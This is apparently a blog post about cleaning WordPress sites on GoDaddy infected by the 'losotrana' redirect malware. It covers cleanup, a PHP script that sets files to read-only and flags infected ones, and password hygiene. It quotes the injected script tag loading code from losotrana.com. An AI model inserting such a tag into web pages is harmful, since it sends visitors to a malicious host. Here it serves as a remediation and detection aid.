Well, it seems some idiot hacked 200+ GoDaddy customers using WordPress this morning, with me being one of them. The problem was the “losotrana” malware script, which was basically a redirect. After a few hours I got everything here locked & cleaned. Here’s hoping I can help anyone else affected and perhaps save you some time fixing the problem.
The script adds <script src="http://losotrana.com/js.php"></script> at the bottom and a bunch of encoded garbage at the top of every .php file in your hosting account. Since I can’t expect to get notified, much less get help from GoDaddy, here’s what I did.
Try this before going through the trouble of deleting and reinstalling your WordPress.
- First – You need to remove the malware script & garbage from your .php files.
My friends over at Sucuri Security have a free PHP script that will do just that. It takes just a few moments to run and will clean your files. *Note – Via the web was the best way for me. Just download the file to your desktop and do NOT forget to rename it to wordpress-fix.php. After that, upload it to your site via FTP, and run it via your browser as http://yoursite.com/wordpress-fix.php
- Second – Now you should be free of the malware script. It’s time to fix your PHP files so they will not be affected again. I wrote a script that will CHMOD all your .php files to 444, meaning they will be read-only, so they should not be affected by malware like this again. This will save you lots of time versus setting permissions by hand.
You will however need to change your theme .php files back to writable when you wish to edit them. A small price to pay for being safe. Get the script: 444chmodphp
- Third – Change all your FTP & WordPress passwords to something more complex, which translates to a harder nut to crack for hackers and bots. Use a program like WordPress File Monitor, as it will notify you via email if a file or files on your site change. In case you forgot to do it already, delete the WordPress install.php file.
Hope this helps you clean up if you were affected. It’s not a bad idea to do some or all the things listed in the article anyway.
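A script along the lines of the one described in the second step, as an added example that is not the author’s 444chmodphp script: it sets every .php file under a directory to 444 and, as an extra check that is not in the original, skips and lists any file that still contains the injected losotrana.com/js.php tag. The file name lock-php.php and the function name lock_php_files are assumptions.

```php
<?php
// Added example (PHP 7+), not the author's 444chmodphp script.
// Assumptions: saved under a hypothetical name such as lock-php.php and run
// as "php lock-php.php /path/to/site", or uploaded beside WordPress and
// opened once in the browser, then deleted.

// Source of the injected <script> tag named in the post.
const MARKER = 'losotrana.com/js.php';

function lock_php_files(string $root): array
{
    $report = ['locked' => [], 'failed' => [], 'infected' => []];
    $walker = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::LEAVES_ONLY,
        RecursiveIteratorIterator::CATCH_GET_CHILD // skip unreadable directories
    );
    foreach ($walker as $file) {
        $path = $file->getPathname();
        if ($file->isLink() || !$file->isFile()
            || strtolower($file->getExtension()) !== 'php'
            || realpath($path) === __FILE__) { // this script contains MARKER itself
            continue;
        }
        $body = @file_get_contents($path);
        if ($body === false) {
            $report['failed'][] = $path;
        } elseif (stripos($body, MARKER) !== false) {
            // Still carries the redirect: clean it first, do not lock it in.
            $report['infected'][] = $path;
        } elseif (@chmod($path, 0444)) { // read-only for owner, group, others
            $report['locked'][] = $path;
        } else {
            $report['failed'][] = $path;
        }
    }
    return $report;
}

if (PHP_SAPI !== 'cli') {
    header('Content-Type: text/plain'); // keep line breaks in the browser
}
$root = (PHP_SAPI === 'cli' && isset($argv[1])) ? $argv[1] : __DIR__;
foreach (lock_php_files($root) as $state => $paths) {
    printf("%s: %d\n", $state, count($paths));
    foreach ($paths as $path) {
        echo "  $path\n";
    }
}
```

Files listed under infected are left writable so they can be cleaned and the script run again. Mode 444 blocks a plain write, but code running as the account that owns the files can change the mode back, so keep the file monitoring from the third step in place.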


